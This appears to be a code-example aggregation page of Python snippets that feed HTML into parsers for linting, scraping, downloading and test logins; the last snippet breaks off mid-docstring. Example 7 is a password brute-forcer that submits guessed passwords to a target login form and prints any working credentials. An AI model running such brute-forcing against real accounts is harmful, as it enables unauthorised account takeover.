Ejemplo n.º 1
0
    def check_html_tags_and_attributes(self):
        """This function checks the indentation of lines in HTML files.

        Returns:
            TaskResult. A TaskResult object representing the result of the lint
            check.
        """
        html_files_to_lint = self.html_filepaths
        failed = False
        error_messages = []
        name = 'HTML tag and attribute'

        for filepath in html_files_to_lint:
            file_content = self.file_cache.read(filepath)
            file_lines = self.file_cache.readlines(filepath)
            parser = CustomHTMLParser(filepath, file_lines, self.debug)
            parser.feed(file_content)

            if len(parser.tag_stack) != 0:
                raise TagMismatchException('Error in file %s\n' % filepath)

            if parser.failed:
                error_messages.extend(parser.error_messages)
                failed = True
        return concurrent_task_utils.TaskResult(
            name, failed, error_messages, error_messages)
Ejemplo n.º 2
0
def fetch(url):
    if url.startswith("ipfs:/"):
        url = "https://ipfs.io/%s" % url[6:]
    elif url.startswith("fs:/"):
        url = "https://ipfs.io/%s" % url[4:]

    if url == "-":
        return sys.stdin.read()

    if url.startswith("http:") or url.startswith("https:"):
        response = urllib.request.urlopen(url)
        data = response.read().decode(errors='replace')

        content_type = response.headers['Content-Type']
        if content_type and content_type.startswith('text/html'):
            parser = Parser()
            parser.feed(data)
            url = parser.url

            if not url:
                raise LoadError("""<link rel="alternate" type="application/asciicast+json" href="..."> not found in fetched HTML document""")

            return fetch(url)

        return data

    with open(url, 'r') as f:
        return f.read()
Ejemplo n.º 3
0
def download_problem(contest_uri, problem):
    problem_uri = contest_uri + '/problem/' + problem
    print('Retrieving', problem_uri, '...')
    sys.stdout.flush()
    problem_html = urllib.request.urlopen(problem_uri).read().decode('utf-8')
    print('Retrieved problem {} ({} bytes).'.format(problem, len(problem_html)))

    # Hack for codeforces HTML errors
    problem_html = problem_html.replace('<p</p>', '<p></p>')
    problem_html = problem_html.replace('<ul</ul>', '<ul></ul>')
    problem_html = problem_html.replace('<div class="sample-test"<', '<div class="sample-test"><')

    parser = ProblemHTMLParser()
    try:
        parser.feed(problem_html)
    except:
        print(problem_html, file=sys.stderr)
        raise

    examples = parser.getExamples()

    problem_dir = problem.lower()
    if not os.path.isdir(problem_dir):
        os.mkdir(problem_dir)

    for i, example in enumerate(examples, 1):
        input_path = os.path.join(problem_dir, 'in{}'.format(i))
        with open(input_path, 'w') as f:
            f.write(example[0])

        output_path = os.path.join(problem_dir, 'out{}'.format(i))
        with open(output_path, 'w') as f:
            f.write(example[1])

    print('Wrote {} examples for problem {}.'.format(len(examples), problem))
Ejemplo n.º 4
0
async def main(request):
    body = await request.read()

    secret = os.environ['GH_SECRET']
    oauth_token = os.environ['GH_AUTH']
    event = sansio.Event.from_http(
        request.headers,
        body,
        secret=secret
    )

    async with aiohttp.ClientSession() as session:
        gh = gh_aiohttp.GitHubAPI(session, "asv-bot", oauth_token=oauth_token)
        await router.dispatch(event, gh)
        response = await session.get("https://pandas.pydata.org/speed")
        text = await response.text()
        parser = ProjectParser()
        parser.feed(text)
        projects = parser.projects
        # today = datetime.date.today()
        today = datetime.date(2019, 4, 5)
        futures = [
            handle_regressions(project, gh, since=today)
            for project in projects
        ]
        await asyncio.gather(*futures)

    return web.Response(status=200)
Ejemplo n.º 5
0
def fetch(url):
    if url.startswith("ipfs:/"):
        url = "https://ipfs.io/%s" % url[6:]
    elif url.startswith("fs:/"):
        url = "https://ipfs.io/%s" % url[4:]

    if url == "-":
        return sys.stdin.read()

    if url.startswith("http:") or url.startswith("https:"):
        response = urllib.request.urlopen(url)
        data = response.read().decode(errors='replace')

        content_type = response.headers['Content-Type']
        if content_type and content_type.startswith('text/html'):
            parser = Parser()
            parser.feed(data)
            url = parser.url

            if not url:
                raise LoadError(
                    """<link rel="alternate" type="application/asciicast+json" href="..."> not found in fetched HTML document"""
                )

            return fetch(url)

        return data

    with open(url, 'r') as f:
        return f.read()
Ejemplo n.º 6
0
        def run(self):

            self.parent.visited+=[self.url]

            if self.gleb>0:
                parser = self.HParser(self.url)

                contents = ""
                try:
                    response = urlopen(self.url)
                    contents = response.read().decode('utf-8')
                except HTTPError:
                    pass
                parser.feed(contents)

                parser.close()
                for v in parser.vals: #przeszukujemy podstrony
                    if not v in self.parent.visited:
                        thr = Probe.Thr(v,self.fun,self.gleb-1, self.parent)
                        thr.start()
                        self.parent.threads += [thr]
                        self.children += [thr]

            self.fun(self.url) #uruchamiamy akcje na biezacej stronie

            #czekamy na watki potomne
            for t in self.children:
                t.join()
Ejemplo n.º 7
0
 def web_bruter(self):
     while not self.password_q.empty() and not self.found:
         brute = self.password_q.get().rstrip()
         jar = cookielib.FileCookieJar("cookies")
         opener = urllib.request.build_opener(
             urllib.HTTPCookieProcessor(jar))
         response = opener.open(self.target_get_form_url)
         page = response.read()
         print(
             f"[*] Trying {self.username} : {brute} ({self.password_q.qsize()} Left)"
         )
         # parse out the hidden fields
         parser = self.parser_class()
         parser.feed(page)
         post_tags = parser.tag_results
         # add our username and password fields
         post_tags[self.username_field] = self.username
         post_tags[self.password_field] = brute
         login_data = urllib.parse.urlencode(post_tags)
         login_response = opener.open(self.target_post_form_url, login_data)
         login_result = login_response.read()
         if self.success_checker(login_result):
             self.found = True
             print("[*] Bruteforce Successful!")
             print(f"[*] Username : {self.username}")
             print(f"[*] Password : {brute}")
             print("[*] Waiting for other threads to exit!")
Ejemplo n.º 8
0
def fetch_article_contents(url):
    log_message('fetch_article_contents: `{}`', url)
    contents = urllib.request.urlopen(url)
    parser = ArticleParser()
    parser.feed(contents.read().decode('utf-8'))
    text = ''.join(['<p>{}</p>'.format(s) for s in parser.paragraphs])
    return (contents.geturl(), text)
Ejemplo n.º 9
0
def main(argv=None):
    if argv is None:
        argv = sys.argv[1:]

    output_dir = pathlib.Path(argv[0])
    input_dir = pathlib.Path(argv[1])
    json_filepaths = input_dir.glob("*.json")

    for input_file in json_filepaths:
        parser = ImmunizeNVParser()
        slug = input_file.name.split(".", maxsplit=1)[0]
        output_file = output_dir / f"{slug}.parsed.ndjson"

        with open(input_file, "r") as in_fh:
            content = in_fh.read()
            html_data = extract_locator_data(content)
            parser.feed(html_data)

        with open(output_file, "w") as out_fh:
            parsed = parser.result
            for k in sorted(parsed.keys()):
                parsed[k]["id"] = generate_id(parsed[k]["title"])
                line = json.dumps(parsed[k])
                out_fh.write(line)
                out_fh.write("\n")
Ejemplo n.º 10
0
def identify_html_refs(path, get_ref):
    parser = LinkProcessor(get_ref,
                           containing_component=get_component(path))
    with path.open('r') as f:
        parser.feed(f.read())
    with path.open('r') as f:
        parser.feed(f.read())
Ejemplo n.º 11
0
def clone_from_url(url, branch=None):
    page = urllib.request.urlopen(url)
    parser = HTMLParser()
    parser.feed(page.read().decode("utf-8"))
    title = parser.title
    if not title:
        raise RuntimeError("No title found for %s" % url)
    match = re.match(r"Issue\s+(\d+)\:\s+(.*?) - Python tracker", title)
    if match:
        number, name = match.groups()
    else:
        raise RuntimeError("No suitable title found for %s" % url)
    clone_name = clone_from_name("issue%s-%s" % (number, name), branch)

    #
    # Create a shortcut inside the new clone pointing to
    # the issue page in bugs.python.org
    #
    shortcut = pythoncom.CoCreateInstance (
      shell.CLSID_InternetShortcut,
      None,
      pythoncom.CLSCTX_INPROC_SERVER,
      shell.IID_IUniformResourceLocator
    )
    shortcut.SetURL(url)
    persist_file = shortcut.QueryInterface(pythoncom.IID_IPersistFile)
    path = os.path.abspath(os.path.join(clone_name, "issue%s.url" % number))
    persist_file.Save(path, 0)

    return clone_name
    def set_asciidoc_attributes(self, release_download_url):
        response = requests.get(release_download_url)

        if not response.ok:
            raise IOError(
                "Failed to retrieve download information from: {}".format(
                    release_download_url))

        parser = DownloadsHTMLParser()
        parser.feed(response.text)

        for version in parser.version_list:
            version_key = version.key

            # Add the latest version as "latest" as well as its version number.
            if parser.latest == version.release_number:
                self._asciidoc_attributes["latest"] = {
                    "name": version.name,
                    "date": version.date
                }

            self._asciidoc_attributes[version_key] = {
                "name": version.name,
                "date": version.date
            }
        self._asciidoc_attributes[
            'url_downloads_cassandra'] = release_download_url
Ejemplo n.º 13
0
def github_contrib(user, year):
    """ Get GitHub user daily contribution """

    # Check for a cached version (file)
    filename = "github-{0}-{1}.html".format(user, year)
    if os.path.exists(filename):
        with open(filename) as file:
            contents = file.read()
    # Else get file from GitHub
    else:
        url = "https://github.com/users/{0}/contributions?to={1}-12-31"
        url = url.format(user, year)
        contents = str(urllib.request.urlopen(url).read())
        with open(filename, "w") as file:
            file.write(contents)

    # Parse result (html)
    n = 1 + (date(year, 12, 31) - date(year, 1, 1)).days
    C = -np.ones(n, dtype=int)

    class HTMLParser(html.parser.HTMLParser):
        def handle_starttag(self, tag, attrs):
            if tag == "rect":
                data = {key: value for (key, value) in attrs}
                date = dateutil.parser.parse(data["data-date"])
                count = int(data["data-count"])
                day = date.timetuple().tm_yday - 1
                if count > 0:
                    C[day] = count

    parser = HTMLParser()
    parser.feed(contents)
    return C
Ejemplo n.º 14
0
def scrape(html_content):
    """
    This function could have been a "private" utility but I left it "public" (note the quotation marks, as in Python
    there is no such thing as public or private access identifiers) because this scraping functionality could certainly
    be invoked passing raw HTML content, effectively circumventing the actual HTTP request. This has been useful, for
    instance, for unit testing this behavior.
    :param html_content: a string containing the actual HTML content. Cannot be None or empty.
    :return: a dictionary with two keys: "total" and "top5", containing the total number of elements and the count of
    the top 5 ones, respectively.
    """
    if not html_content:
        raise ValueError('Input is empty')

    parser = HtmlElementsCounter()
    parser.feed(html_content)
    parser.close()  # instructs the parser to consume the input entirely

    total = sum(parser.occurrences_by_tag.values())

    # if the input only has N different elements (N < 5), this dictionary will hold exactly N entries
    top5_elements_with_occurrences = sorted(parser.occurrences_by_tag.items(),
                                            reverse=True,
                                            key=lambda x: x[1])[:5]

    return dict(total=total, top5=top5_elements_with_occurrences)
Ejemplo n.º 15
0
def fetch_card(card_name, dest_file=None):
    """
    Gets card_name's image from magiccards.info and writes it to dest_file.

    @param card_name: the name of the magic card.
    @param dest_file: the file to write the image file to, defaulting to the
                      current directory and card_name as file name.
    """
    url = "http://magiccards.info/query?q=!{}&v=card&s=cname".format(
        urllib.parse.quote(card_name))
    # Can raise URLError
    response = urllib.request.urlopen(url)

    #print(response.info())

    file_contents = response.read().decode("utf-8")
    #with open("test.html", "w") as html_file:
    #    html_file.write(file_contents)

    #file_contents = open("test.html", "r").read()

    parser = ImageTagFinder(card_name, strict=True)
    parser.feed(file_contents)

    print(parser.result_url)

    if parser.result_url is None:
        raise RuntimeError("Couldn't find image for \"{}\"".format(card_name))

    image = urllib.request.urlopen(parser.result_url)

    with open(
        "{}.jpg".format(card_name.lower()) if dest_file is None else dest_file,
        "wb") as image_file:
        image_file.write(image.read())
Ejemplo n.º 16
0
    def getentry(self):
        # Start with the entry from the parent.
        entry = FileHandler.getentry(self)
        parser = HTMLTitleParser()
        file = self.vfs.open(self.getselector(), "rt")
        try:
            while not parser.gotcompletetitle:
                line = file.readline()
                if not line:
                    break
                parser.feed(line)
            parser.close()
        except html.parser.HTMLParseError:
            # Parse error?  Stop parsing, go to here.  We can still
            # return a title if the parse error happened after we got
            # the title.
            pass

        file.close()
        # OK, we've parsed the file and exited because of either an EOF
        # or a complete title (or error).  Now, figure out what happened.

        if parser.gotcompletetitle:
            # Convert all whitespace sequences to a single space.
            # Removes newlines, tabs, etc.  Good for presentation
            # and for security.
            title = re.sub('[\s]+', ' ', parser.titlestr)
            entry.setname(title)
        return entry
Ejemplo n.º 17
0
def xhamster_comment(link):
    class Parser(html.parser.HTMLParser):
        comments = []
        in_comments_block = False
        in_comment = False

        def handle_starttag(self, tag, attrs):
            if tag == "div" and ("id", "commentList") in attrs:
                self.in_comments_block = True
            self.in_comment = self.in_comments_block and tag == "div" and ("class", "oh") in attrs

        def handle_endtag(self, tag):
            self.in_comment = False

        def handle_data(self, data):
            if not self.in_comment:
                return
            cleaned = data.replace("\r", "").replace("\n", "").replace("\\", "").strip()
            if cleaned.isprintable() and len(cleaned) > 0:
                self.comments.append(cleaned)

        def error(self, message):
            pass

    parser = Parser(convert_charrefs=True)

    try:
        response = requests.get(link, timeout=timeout, headers={"User-Agent": random.choice(user_agents)})
        parser.feed(response.text)
    except:
        return "couldn't load comments :("

    comments = sorted(parser.comments, key=lambda x: len(x), reverse=True)
    return comments[0] if len(comments) > 0 else "no comments :("
Ejemplo n.º 18
0
def test(client, page):
    response = client.get(page, follow_redirects=True)
    assert response.status_code == 200
    parser = PageParser()
    parser.feed(response.data.decode(response.charset))
    for url in parser.urls:
        requests.request("HEAD", url).raise_for_status()
def main():
    import sys

    parser = MyHTMLParser()

    if sys.argv[1]:
        url = sys.argv[1]
    else:
        url = "http://instagram.com/sarah3llen"

    try:
        response = urllib.request.urlopen(url, timeout=5)
        contentType = response.getheader("Content-Type")

        if "text/html" in contentType:
            data = response.read()
            html = data.decode("utf-8")

            parser.feed(html)

            if parser.ogpTitle.__len__() > parser.title.__len__():
                title = parser.ogpTitle
            else:
                title = parser.title.replace("\n", "")
        else:
            title = None
    except:
        title = None

    print(title)
Ejemplo n.º 20
0
def makeSampleHTTPRequest(url):  #non-real time
    #resp = urllib.request.urlopen(url)
    #print(resp.read())

    #practice with parsing an URL
    link = "https://docs.python.org/3.6/library/urllib.parse.html#module-urllib.parse"
    urlTuple = urllib.parse.urlparse(link)
    #print(urlTuple)

    #make a POST request to search for "vincent"
    link = "https://pythonprogramming.net/search"
    #build the values of the data: this case the query value
    #urllib.parse.urlencode will get an dict of key/values or sequence of tuple-2 (k,v)
    #  as input to encode it to url format
    #The resulting string is a series of key=value pairs separated by '&' characters,
    # where both key and value are quoted using the quote_via function
    #then convert url format to byte or the type of server encode accepted
    values = {'q': 'robot'}
    data = urllib.parse.urlencode(values)
    data = data.encode(
        'utf-8')  #bytes now, depending on server's accepting encode
    #make a Request obj
    req = urllib.request.Request(link, data, method='POST')
    with urllib.request.urlopen(
            req) as resp:  #get response obj, catching exception
        parser = MyHTMLParser()
        text = resp.read()
        #parser.feed('<html><head><title>Test</title></head> <body><h1>Parse me!</h1></body></html>')
        parser.feed(text.decode())
        #print(pars)
        #print(resp.read())

    return None
Ejemplo n.º 21
0
 def count(filename):
     if not HtmlWordCounter.can_count(filename):
         return 0
     parser = HtmlWordCounter.__HtmlParser()
     with open(filename, encoding="utf-8") as file:
         parser.feed(file.read())
     return parser.count
Ejemplo n.º 22
0
def simplify_html(s):
    """Make a real HTML text compatible with Telegram's pseudo-HTML"""

    parser = _HtmlSimplifying()
    parser.feed(s)
    parser.close()
    return parser.result
Ejemplo n.º 23
0
    def user_login(self, username, password):
        response = self._get_opener().open(CONF.dashboard.dashboard_url).read()

        # Grab the CSRF token and default region
        parser = HorizonHTMLParser()
        parser.feed(response.decode("utf-8"))

        # construct login url for dashboard, discovery accommodates non-/ web
        # root for dashboard
        login_url = parse.urljoin(CONF.dashboard.dashboard_url, parser.login)

        # Prepare login form request
        req = request.Request(login_url)
        req.add_header('Content-type', 'application/x-www-form-urlencoded')
        req.add_header('Referer', CONF.dashboard.dashboard_url)

        # Pass the default domain name regardless of the auth version in order
        # to test the scenario of when horizon is running with keystone v3
        params = {
            'username': username,
            'password': password,
            'region': parser.region,
            'domain': CONF.auth.default_credentials_domain_name,
            'csrfmiddlewaretoken': parser.csrf_token
        }
        self._get_opener().open(req, parse.urlencode(params).encode())
Ejemplo n.º 24
0
 def count(filename):
     if not HtmlWordCounter.can_count(filename):
         return 0
     parser = HtmlWordCounter.__HtmlParser()
     with open(filename, encoding="utf-8") as file:
         parser.feed(file.read())
     return parser.count
Ejemplo n.º 25
0
def get_dependencies(path):
    deps = set()
    parser = DependenciesParser(deps.add)
    with open(path) as f:
        parser.feed(f.read())
    parser.close()
    return iter(deps)
Ejemplo n.º 26
0
def forum_attachments(attach_content):
    parser = p_attachments()
    parser.feed(attach_content)
    markdown_attachments = '\n\n>Attachments:\n'
    for item in parser._a:
        markdown_attachments += '\n>* ' + item
    return markdown_attachments
Ejemplo n.º 27
0
def html_to_markdown(content, host):
    with open('debug/out', 'w') as f:
        f.write(content)
    parser = guildwars2_html2markdown.Htmlparser()
    parser.convert_charrefs = True
    parser.host = 'https://' + host
    content = content.replace('\n', '\n>')
    parser.feed(content)
    # content = tag_bold(content)
    # content = tag_italic(content)
    # content = tag_list(content)
    # content = tag_superscript(content)
    # content = tag_strikethrough(content)
    # content = tag_underline(content)
    # content = tag_breakrow(content)
    # content = tag_h1(content)
    # content = tag_h2(content)
    # content = tag_h3(content)
    # content = tag_h4(content)
    # content = tag_h5(content)
    # content = tag_h6(content)
    # content = tag_hr(content)
    # content = tag_screenshot(content, host)
    # content = tag_paragraph(content)
    # content = tag_iframe(content, host)
    # content = tag_href(content, host)
    # content = tag_img(content, host)
    # content = tag_quote(content, host)
    # content = tag_spoiler(content, host)
    # content = tag_object(content)
    # content = content.strip('\n')
    # content = '>' + content.replace('\n', '\n>')
    # content = tag_other(content)
    print(parser.result)
    return parser.result
def main():
    """Make all of the above work together to finally print the RSS feed."""
    # Initial request
    html_string = get_response_body('/archive?type=episodes')
    # Prepare headers for following requests
    HEADERS['Referer'] = (
        'https://www.thisamericanlife.org/archive?type=episodes'
    )
    HEADERS['X-Requested-With'] = 'XMLHttpRequest'
    parser = Parser()
    parser.feed(html_string)
    tree = parser.close()
    episodes = findall_episodes(tree)
    count = tree.find('.//div[@class="count-sort"]/div[@class="count"]').text
    count = int(count.split()[2])
    for page in range(int(count / 48)):
        page = page + 1
        time.sleep(1)
        json_string = get_response_body(f'/archive?type=episodes&page={page}')
        html_string = json.loads(json_string)['html']
        parser = Parser()
        parser.feed(html_string)
        tree = parser.close()
        new_episodes = findall_episodes(tree)
        episodes = episodes + new_episodes

    RSS['rss']['channel']['item'] = episodes
    xml_tree = dictionary_to_xml(RSS)
    xml_string = xml.etree.ElementTree.tostring(
        xml_tree, encoding='utf-8', method='xml'
    ).decode()
    print(xml_string)
Ejemplo n.º 29
0
async def search(title, title_types, year=None):
    '''Search by title in the IMDB site.
    title_type might be one of: 'Movie', 'TV Series', 'Video', 'Short',
    'TV Mini-Series', 'TV Movie', 'TV Episode' or 'Video Game'.
    '''
    # Check that the type of title is correct
    for t in title_types:
        if t not in _SEARCH_TYPES:
            raise ValueError("wrong type '{}'".format(t))
    # Build the URL of the search page
    search_attributes = {'ref_': 'nv_sr_fn', 's': 'tt', 'q': title}
    url = '{}?{}'.format(_IMDB_SEARCH_URL,
                         urllib.parse.urlencode(search_attributes))

    # Fetch the list of titles
    http_client = tornado.httpclient.AsyncHTTPClient()
    response = await http_client.fetch(url, headers=_HTTP_HEADERS)

    # Parse the desired information from the result
    parser = SearchParser()
    parser.feed(response.body.decode('utf-8'))

    # Return the list of titles
    # Keep only the titles with the right type or, if the year is given, those
    # corresponding to that year.
    return [
        a for a in parser.results if a['type'] in title_types and (
            year is None or a['year'] == year or a['year'] == year - 1)
    ]
Ejemplo n.º 30
0
def parse_category_ids(htmltext):
    """
        Example:
        <div data-id="601" class="catalogue-list-item">Analog ICs <br></div>

    """
    class CategoriesParser(html.parser.HTMLParser):
        categories = []
        last_category_id = None

        def handle_starttag(self, tag, attrs):
            category_id = None
            for name, value in attrs:
                if name == 'data-id':
                    category_id = value
            if category_id:
                self.last_category_id = category_id
                self.text = ''

        def handle_data(self, data):
            if self.last_category_id:
                self.text += data

        def handle_endtag(self, tag):
            if self.last_category_id:
                id_and_name = (self.last_category_id, self.text.strip())
                self.last_category_id = None
                self.text = ''
                self.categories.append(id_and_name)
                print(id_and_name)

    parser = CategoriesParser()
    parser.feed(htmltext)
    return parser.categories
Ejemplo n.º 31
0
def parse(content, count):
    parser = OAParser(count)
    parser.feed(content)
    data = copy.deepcopy(parser.objects)
    # 不然上次的数据会残留
    parser.clear()
    return data
Ejemplo n.º 32
0
def parse(content, count):
    parser = OAParser(count)
    parser.feed(content)
    data = copy.deepcopy(parser.objects)
    # 不然上次的数据会残留
    parser.clear()
    return data
Ejemplo n.º 33
0
def parse_jobisjob_offers():
    offer_entries = []
    parser = JobIsJobParser()
    url = "/search?what=stage&where=rennes&category=IT&jobType=Stage"
    jobisjob_connection = http.client.HTTPConnection("www.jobisjob.fr")
    jobisjob_connection.connect()
    jobisjob_connection.request("GET", url)
    jobisjob_response = jobisjob_connection.getresponse()
    page = jobisjob_response.read().decode("utf-8")
    parser.feed(page)
    jobisjob_connection.close()
    next_urls = copy.deepcopy(parser.next_pages)
    offer_entries = offer_entries + parser.offer_entries
    for next_url in next_urls:
        parser = JobIsJobParser()
        jobisjob_connection = http.client.HTTPConnection("www.jobisjob.fr")
        jobisjob_connection.connect()
        jobisjob_connection.request("GET", next_url)
        jobisjob_response = jobisjob_connection.getresponse()
        if jobisjob_response.getcode() == 301:
            actual_url = jobisjob_response.getheader("Location")
            jobisjob_connection.close()
            if actual_url is None:
                continue
            jobisjob_connection = http.client.HTTPConnection("www.jobisjob.fr")
            jobisjob_connection.connect()
            jobisjob_connection.request("GET", actual_url)
            jobisjob_response = jobisjob_connection.getresponse()
        page = jobisjob_response.read().decode("utf-8")
        parser.feed(page)
        jobisjob_connection.close()
        offer_entries = offer_entries + parser.offer_entries
    return offer_entries
Ejemplo n.º 34
0
def bibtex_entry_from_pmid(pmid: str) -> str:
    assert pmid.isdigit(), pmid
    resp = requests.get(_TEXMED_URL_PATTERN.format(pmid=pmid))
    resp.raise_for_status()
    parser = _TeXMedHtmlParser()
    parser.feed(resp.text)
    return parser.bibtex_entry
Ejemplo n.º 35
0
def download_problem(contest_uri, problem):
    problem_uri = contest_uri + '/problem/' + problem
    print('Retrieving', problem_uri, '...')
    sys.stdout.flush()
    problem_html = urllib.request.urlopen(problem_uri).read().decode('utf-8')
    print('Retrieved problem {} ({} bytes).'.format(problem, len(problem_html)))

    # Hack for codeforces HTML errors
    problem_html = problem_html.replace('<p</p>', '<p></p>')
    problem_html = problem_html.replace('<ul</ul>', '<ul></ul>')
    problem_html = problem_html.replace('<div class="sample-test"<', '<div class="sample-test"><')

    parser = ProblemHTMLParser()
    try:
        parser.feed(problem_html)
    except:
        print(problem_html, file=sys.stderr)
        raise

    examples = parser.getExamples()

    problem_dir = problem.lower()
    if not os.path.isdir(problem_dir):
        os.mkdir(problem_dir)

    for i, example in enumerate(examples, 1):
        input_path = os.path.join(problem_dir, '{}.in.{}'.format(problem.lower(), i))
        with open(input_path, 'w') as f:
            f.write(example[0])

        output_path = os.path.join(problem_dir, '{}.out.{}'.format(problem.lower(), i))
        with open(output_path, 'w') as f:
            f.write(example[1])

    print('Wrote {} examples for problem {}.'.format(len(examples), problem))
Ejemplo n.º 36
0
def forum_attachments(attach_content):
    parser = p_attachments()
    parser.feed(attach_content)
    markdown_attachments = '\n\n>Attachments:\n'
    for item in parser._a:
        markdown_attachments += '\n>* ' + item
    return markdown_attachments
Ejemplo n.º 37
0
	def getCardDetails(self, uid):
		user = rfidUser()
		user.rfidCardUid = binascii.hexlify(uid).decode('ascii')

		#StaffId von ifaic mittels UID der Karte abfragen
		logging.debug("request ifaic staff id")
		req = urllib.request.Request(url=self._url+'cards/{}'.format(binascii.hexlify(uid).decode('ascii')), headers={"Content-Type":"application/json"})
		userAndPass = base64.b64encode("{}:{}".format(self._user, self._password).encode()).decode("ascii")
		req.add_header("Authorization", 'Basic {:s}'.format(userAndPass))
		resp =  urllib.request.urlopen(req)
		body = resp.read()
		data = json.loads(body.decode())
		user.staffId = data['ikaFkaIdentStaffId']
		
		#Aus StaffId und ifaic Mitarbeiterseite Vorname und Nachname herausfinden
		#req = urllib.request.Request(url='https://ifaic.ika.rwth-aachen.de/info/mitarbeiterliste_komp.php')
		logging.debug("request ifaic user name")
		req = urllib.request.Request(url=self._mitarbeiterlisteUrl)
		resp =  urllib.request.urlopen(req)
		body = resp.read()
		logging.debug("parse response")
		#Für schnelleres Parsen wird beim finden eines Ergebnis eine Exception geworfen
		try:
			parser = ifaicMitarbeiterlisteParser(user.staffId)
			parser.feed(body.decode('iso-8859-1'))
		except:
			logging.debug("parsed")
			logging.debug(parser.userName)
			user.surname = parser.surname
			user.givenName = parser.givenName
			user.userName = parser.userName
			return user
		return None
Ejemplo n.º 38
0
 def auth_usr(email, password, client_id, scope, opener):
     print("TRY TO AUTH")
     #TODO словить эксепшн
     login_page = "http://oauth.vk.com/oauth/authorize?" + \
             "redirect_uri=http://oauth.vk.com/blank.html&response_type=token&" + \
             "client_id=%s&scope=%s&display=wap" % (client_id, ",".join(scope))
     #print(login_page)
     auth_page = opener.open("http://oauth.vk.com/oauth/authorize?" + \
             "redirect_uri=http://oauth.vk.com/blank.html&response_type=token&" + \
             "client_id=%s&scope=%s&display=wap" % (client_id, ",".join(scope)))
     auth_page = auth_page.read()
     parser = AuthParser()
     parser.feed(str(auth_page))
     parser.close()
     if not parser.form_parsed or parser.url is None or "pass" not in parser.params or \
           "email" not in parser.params or parser.method != "POST":
         parser.error = "Some problems"
     if parser.error != "OK":
         return -1, -1, parser.error
     parser.params["email"] = email
     parser.params["pass"] = password
     parser.params["v"] = "5.2"
     #TODO словить эксепшн
     response = opener.open(parser.url, urllib.parse.urlencode(parser.params).encode("UTF-8"))
     page = response.read()
     url = response.geturl()
     return page, url, parser.error
Ejemplo n.º 39
0
        def handle_body(body):
            parser = HTMLTitleParser()
            parser.feed(body.decode('utf-8'))

            if parser.title_data == self._library_title:
                return True
            return False
Ejemplo n.º 40
0
    def title(self, irc, msg, args, optlist, url):
        """[--no-filter] <url>

        Returns the HTML <title>...</title> of a URL.
        If --no-filter is given, the bot won't strip special chars (action,
        DCC, ...).
        """
        if not self._checkURLWhitelist(url):
            irc.error("This url is not on the whitelist.")
            return
        size = conf.supybot.protocols.http.peekSize()
        text = utils.web.getUrl(url, size=size)
        try:
            text = text.decode(utils.web.getEncoding(text) or 'utf8',
                    'replace')
        except:
            pass
        parser = Title()
        try:
            parser.feed(text)
        except html.parser.HTMLParseError:
            self.log.debug('Encountered a problem parsing %u.  Title may '
                           'already be set, though', url)
        if parser.title:
            title = utils.web.htmlToText(parser.title.strip())
            if not [y for x,y in optlist if x == 'no-filter']:
                for i in range(1, 4):
                    title = title.replace(chr(i), '')
            irc.reply(title)
        elif len(text) < size:
            irc.reply(_('That URL appears to have no HTML title.'))
        else:
            irc.reply(format(_('That URL appears to have no HTML title '
                             'within the first %S.'), size))
Ejemplo n.º 41
0
    def _query_eol_list(self) -> typing.List[str]:
        """Scrape the FreeBSD website and return a list of EOL RELEASES."""
        request = urllib.request.Request(
            self.eol_url,
            headers={
                "Accept-Charset": "utf-8"
            }
        )
        self.logger.verbose(f"Downloading EOL info from {self.eol_url}")
        with urllib.request.urlopen(request) as response:  # nosec: B310

            response_code = response.getcode()
            if response_code != 200:  # noqa: T484
                libioc.errors.DownloadFailed(
                    topic="EOL Warnings",
                    code=response_code,
                    logger=self.logger,
                    level="warning"
                )
                return []

            parser = EOLParser()
            data = response.read().decode("utf-8", "ignore")
            parser.feed(data)
            parser.close()

            return parser.eol_releases
Ejemplo n.º 42
0
def latest_simc_version(
        major_ver: str = _CURRENT_SIMC_VERSION,
        platform: Optional[str] = None) -> Optional[Tuple[str, str]]:
    """
    Checks the SimulationCraft nightly builds for the latest binary build.
    
    Args:
        major_ver: A major version of simc, eg: '910-01'.
        platform: Platform to check, eg: 'win64', 'macos', or None to auto-detect.

    Returns:
        tuple of (filename, git_commit) with the latest version.
    """
    if not platform:
        platform = simc_platform()
        if not platform:
            # Unsupported platform, cannot answer.
            return

    listing = urlopen('http://downloads.simulationcraft.org/nightly/?C=M;O=D'
                      ).read().decode('utf-8')
    parser = LinkParser()
    parser.feed(listing)

    # Parse the filenames
    for link in parser.links:
        v = _PACKAGE_RE.match(link)
        if not v:
            continue
        if major_ver == v.group('version') and platform == v.group('platform'):
            return (v.group('filename'), v.group('git_commit'))
Ejemplo n.º 43
0
def parse_indeed_offers():
    offer_entries = []
    parser = IndeedParser()
    url = "/emplois?q=informatique&l=Rennes+(35)&radius=5&jt=internship&sort=date"
    indeed_connection = http.client.HTTPConnection("www.indeed.fr")
    indeed_connection.connect()
    indeed_connection.request("GET", url)
    indeed_response = indeed_connection.getresponse()
    parser.feed(indeed_response.read().decode("utf-8"))
    indeed_connection.close()
    next_urls = copy.deepcopy(parser.next_pages)
    offer_entries = offer_entries + parser.offer_entries
    for next_url in next_urls:
        parser = IndeedParser()
        indeed_connection = http.client.HTTPConnection("www.indeed.fr")
        indeed_connection.connect()
        indeed_connection.request("GET", next_url)
        indeed_response = indeed_connection.getresponse()
        if indeed_response.getcode() == 301:
            actual_url = indeed_response.getheader("Location")
            indeed_connection.close()
            if actual_url is None:
                continue
            indeed_connection = http.client.HTTPConnection("www.indeed.fr")
            indeed_connection.connect()
            indeed_connection.request("GET", actual_url)
            indeed_response = indeed_connection.getresponse()
        page = indeed_response.read().decode("utf-8")
        parser.feed(page)
        indeed_connection.close()
        offer_entries = offer_entries + parser.offer_entries
    return offer_entries
def extract_angular(fileobj, keywords, comment_tags, options):
    """Extract messages from angular template (HTML) files.

    It extract messages from angular template (HTML) files that use
    angular-gettext translate directive as per
    https://angular-gettext.rocketeer.be/

    :param fileobj: the file-like object the messages should be extracted
                    from
    :param keywords: This is a standard parameter so it isaccepted but ignored.

    :param comment_tags: This is a standard parameter so it is accepted but
                        ignored.
    :param options: Another standard parameter that is accepted but ignored.
    :return: an iterator over ``(lineno, funcname, message, comments)``
             tuples
    :rtype: ``iterator``
    """

    parser = AngularGettextHTMLParser()

    for line in fileobj:
        parser.feed(encodeutils.safe_decode(line))

    for string in parser.strings:
        yield (string)
Ejemplo n.º 45
0
def getUrlToPdf():
    """
    Sucht auf der Lieferdienst-Website nach der Speisekarten-URL:
     - durchsucht Website nach Link zur Speisekarte
     - erstellt URL aus Website-URL und Referenz zu Speisekarte
    :return: zusammengesetzte URL
